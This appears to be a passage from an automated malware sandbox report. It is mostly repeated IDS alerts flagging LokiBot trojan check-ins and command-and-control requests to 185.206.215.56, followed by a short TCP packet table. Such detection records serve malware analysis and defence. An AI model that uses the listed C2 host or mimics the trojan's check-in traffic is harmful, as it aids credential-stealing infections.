                                                                                        01/05/21-19:07:05.505004TCP2025483ET TROJAN LokiBot Fake 404 Response8049316185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:05.711231TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.711231TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.711231TCP2025381ET TROJAN LokiBot Checkin4931780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.711231TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.862498TCP2025483ET TROJAN LokiBot Fake 404 Response8049317185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:06.056308TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.056308TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.056308TCP2025381ET TROJAN LokiBot Checkin4931880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.056308TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.254066TCP2025483ET TROJAN LokiBot Fake 404 Response8049318185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:06.456725TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.456725TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.456725TCP2025381ET TROJAN LokiBot Checkin4931980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.456725TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.617598TCP2025483ET TROJAN LokiBot Fake 404 Response8049319185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:06.823587TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.823587TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.823587TCP2025381ET TROJAN LokiBot Checkin4932080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.823587TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.974484TCP2025483ET TROJAN LokiBot Fake 404 Response8049320185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:07.184056TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.184056TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.184056TCP2025381ET TROJAN LokiBot Checkin4932180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.184056TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.346312TCP2025483ET TROJAN LokiBot Fake 404 Response8049321185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:07.553003TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.553003TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.553003TCP2025381ET TROJAN LokiBot Checkin4932280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.553003TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.742274TCP2025483ET TROJAN LokiBot Fake 404 Response8049322185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:07.954109TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.954109TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.954109TCP2025381ET TROJAN LokiBot Checkin4932380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.954109TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.126146TCP2025483ET TROJAN LokiBot Fake 404 Response8049323185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:08.324968TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.324968TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.324968TCP2025381ET TROJAN LokiBot Checkin4932480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.324968TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.523216TCP2025483ET TROJAN LokiBot Fake 404 Response8049324185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:08.752322TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.752322TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.752322TCP2025381ET TROJAN LokiBot Checkin4932580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.752322TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.911141TCP2025483ET TROJAN LokiBot Fake 404 Response8049325185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:09.107951TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.107951TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.107951TCP2025381ET TROJAN LokiBot Checkin4932680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.107951TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.274146TCP2025483ET TROJAN LokiBot Fake 404 Response8049326185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:09.490262TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.490262TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.490262TCP2025381ET TROJAN LokiBot Checkin4932780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.490262TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.668226TCP2025483ET TROJAN LokiBot Fake 404 Response8049327185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:09.873125TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.873125TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.873125TCP2025381ET TROJAN LokiBot Checkin4932880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.873125TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.024941TCP2025483ET TROJAN LokiBot Fake 404 Response8049328185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:10.232858TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.232858TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.232858TCP2025381ET TROJAN LokiBot Checkin4932980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.232858TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.470073TCP2025483ET TROJAN LokiBot Fake 404 Response8049329185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:10.663115TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.663115TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.663115TCP2025381ET TROJAN LokiBot Checkin4933080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.663115TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.820501TCP2025483ET TROJAN LokiBot Fake 404 Response8049330185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:11.027929TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.027929TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.027929TCP2025381ET TROJAN LokiBot Checkin4933180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.027929TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.198428TCP2025483ET TROJAN LokiBot Fake 404 Response8049331185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:11.409139TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.409139TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.409139TCP2025381ET TROJAN LokiBot Checkin4933280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.409139TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.568467TCP2025483ET TROJAN LokiBot Fake 404 Response8049332185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:11.779641TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.779641TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.779641TCP2025381ET TROJAN LokiBot Checkin4933380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.779641TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.948839TCP2025483ET TROJAN LokiBot Fake 404 Response8049333185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:12.151046TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.151046TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.151046TCP2025381ET TROJAN LokiBot Checkin4933480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.151046TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.322356TCP2025483ET TROJAN LokiBot Fake 404 Response8049334185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:12.528628TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.528628TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.528628TCP2025381ET TROJAN LokiBot Checkin4933580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.528628TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.702702TCP2025483ET TROJAN LokiBot Fake 404 Response8049335185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:12.913605TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.913605TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.913605TCP2025381ET TROJAN LokiBot Checkin4933680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.913605TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.081152TCP2025483ET TROJAN LokiBot Fake 404 Response8049336185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:13.293357TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.293357TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.293357TCP2025381ET TROJAN LokiBot Checkin4933780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.293357TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.445018TCP2025483ET TROJAN LokiBot Fake 404 Response8049337185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:13.661854TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.661854TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.661854TCP2025381ET TROJAN LokiBot Checkin4933880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.661854TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.836048TCP2025483ET TROJAN LokiBot Fake 404 Response8049338185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:14.047995TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.047995TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.047995TCP2025381ET TROJAN LokiBot Checkin4933980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.047995TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.227580TCP2025483ET TROJAN LokiBot Fake 404 Response8049339185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:14.442937TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.442937TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.442937TCP2025381ET TROJAN LokiBot Checkin4934080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.442937TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.596332TCP2025483ET TROJAN LokiBot Fake 404 Response8049340185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:14.806537TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.806537TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.806537TCP2025381ET TROJAN LokiBot Checkin4934180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.806537TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.974222TCP2025483ET TROJAN LokiBot Fake 404 Response8049341185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:15.187360TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:15.187360TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:15.187360TCP2025381ET TROJAN LokiBot Checkin4934280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:15.187360TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:15.351310TCP2025483ET TROJAN LokiBot Fake 404 Response8049342185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:15.557295TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:15.557295TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:15.557295TCP2025381ET TROJAN LokiBot Checkin4934380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:15.557295TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:15.731776TCP2025483ET TROJAN LokiBot Fake 404 Response8049343185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:15.953688TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:15.953688TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:15.953688TCP2025381ET TROJAN LokiBot Checkin4934480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:15.953688TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:16.112186TCP2025483ET TROJAN LokiBot Fake 404 Response8049344185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:16.321602TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:16.321602TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:16.321602TCP2025381ET TROJAN LokiBot Checkin4934580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:16.321602TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:16.490419TCP2025483ET TROJAN LokiBot Fake 404 Response8049345185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:16.691140TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:16.691140TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:16.691140TCP2025381ET TROJAN LokiBot Checkin4934680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:16.691140TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:16.849536TCP2025483ET TROJAN LokiBot Fake 404 Response8049346185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:17.070972TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:17.070972TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:17.070972TCP2025381ET TROJAN LokiBot Checkin4934780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:17.070972TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:17.241789TCP2025483ET TROJAN LokiBot Fake 404 Response8049347185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:17.441718TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:17.441718TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:17.441718TCP2025381ET TROJAN LokiBot Checkin4934880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:17.441718TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:17.595691TCP2025483ET TROJAN LokiBot Fake 404 Response8049348185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:17.814658TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:17.814658TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:17.814658TCP2025381ET TROJAN LokiBot Checkin4934980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:17.814658TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:17.974679TCP2025483ET TROJAN LokiBot Fake 404 Response8049349185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:18.170246TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14935080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:18.170246TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4935080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:18.170246TCP2025381ET TROJAN LokiBot Checkin4935080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:18.170246TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24935080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:18.342973TCP2025483ET TROJAN LokiBot Fake 404 Response8049350185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:18.546784TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14935180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:18.546784TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4935180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:18.546784TCP2025381ET TROJAN LokiBot Checkin4935180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:18.546784TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24935180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:18.726488TCP2025483ET TROJAN LokiBot Fake 404 Response8049351185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:18.940629TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14935280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:18.940629TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4935280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:18.940629TCP2025381ET TROJAN LokiBot Checkin4935280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:18.940629TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24935280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:19.100818TCP2025483ET TROJAN LokiBot Fake 404 Response8049352185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:19.314073TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14935380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:19.314073TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4935380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:19.314073TCP2025381ET TROJAN LokiBot Checkin4935380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:19.314073TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24935380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:19.472804TCP2025483ET TROJAN LokiBot Fake 404 Response8049353185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:19.678882TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14935480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:19.678882TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4935480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:19.678882TCP2025381ET TROJAN LokiBot Checkin4935480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:19.678882TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24935480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:19.836989TCP2025483ET TROJAN LokiBot Fake 404 Response8049354185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:20.060760TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14935580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:20.060760TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4935580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:20.060760TCP2025381ET TROJAN LokiBot Checkin4935580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:20.060760TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24935580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:20.222456TCP2025483ET TROJAN LokiBot Fake 404 Response8049355185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:20.437125TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14935680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:20.437125TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4935680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:20.437125TCP2025381ET TROJAN LokiBot Checkin4935680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:20.437125TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24935680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:20.607773TCP2025483ET TROJAN LokiBot Fake 404 Response8049356185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:20.817267TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14935780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:20.817267TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4935780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:20.817267TCP2025381ET TROJAN LokiBot Checkin4935780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:20.817267TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24935780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:20.984601TCP2025483ET TROJAN LokiBot Fake 404 Response8049357185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:21.198560TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14935880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:21.198560TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4935880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:21.198560TCP2025381ET TROJAN LokiBot Checkin4935880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:21.198560TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24935880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:21.387078TCP2025483ET TROJAN LokiBot Fake 404 Response8049358185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:21.572190TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14935980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:21.572190TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4935980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:21.572190TCP2025381ET TROJAN LokiBot Checkin4935980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:21.572190TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24935980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:21.741504TCP2025483ET TROJAN LokiBot Fake 404 Response8049359185.206.215.56192.168.2.22

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Jan 5, 2021 19:05:20.748044014 CET49165443192.168.2.22104.22.0.232
                                                                                        Jan 5, 2021 19:05:20.788083076 CET44349165104.22.0.232192.168.2.22
                                                                                        Jan 5, 2021 19:05:20.788252115 CET49165443192.168.2.22104.22.0.232
                                                                                        Jan 5, 2021 19:05:20.805231094 CET49165443192.168.2.22104.22.0.232
                                                                                        Jan 5, 2021 19:05:20.845263958 CET44349165104.22.0.232192.168.2.22
                                                                                        Jan 5, 2021 19:05:20.849673986 CET44349165104.22.0.232192.168.2.22
                                                                                        Jan 5, 2021 19:05:20.849720001 CET44349165104.22.0.232192.168.2.22
                                                                                        Jan 5, 2021 19:05:20.849750996 CET44349165104.22.0.232192.168.2.22
                                                                                        Jan 5, 2021 19:05:20.849864960 CET49165443192.168.2.22104.22.0.232
                                                                                        Jan 5, 2021 19:05:20.865313053 CET49165443192.168.2.22104.22.0.232
                                                                                        Jan 5, 2021 19:05:20.905706882 CET44349165104.22.0.232192.168.2.22
                                                                                        Jan 5, 2021 19:05:20.905836105 CET44349165104.22.0.232192.168.2.22
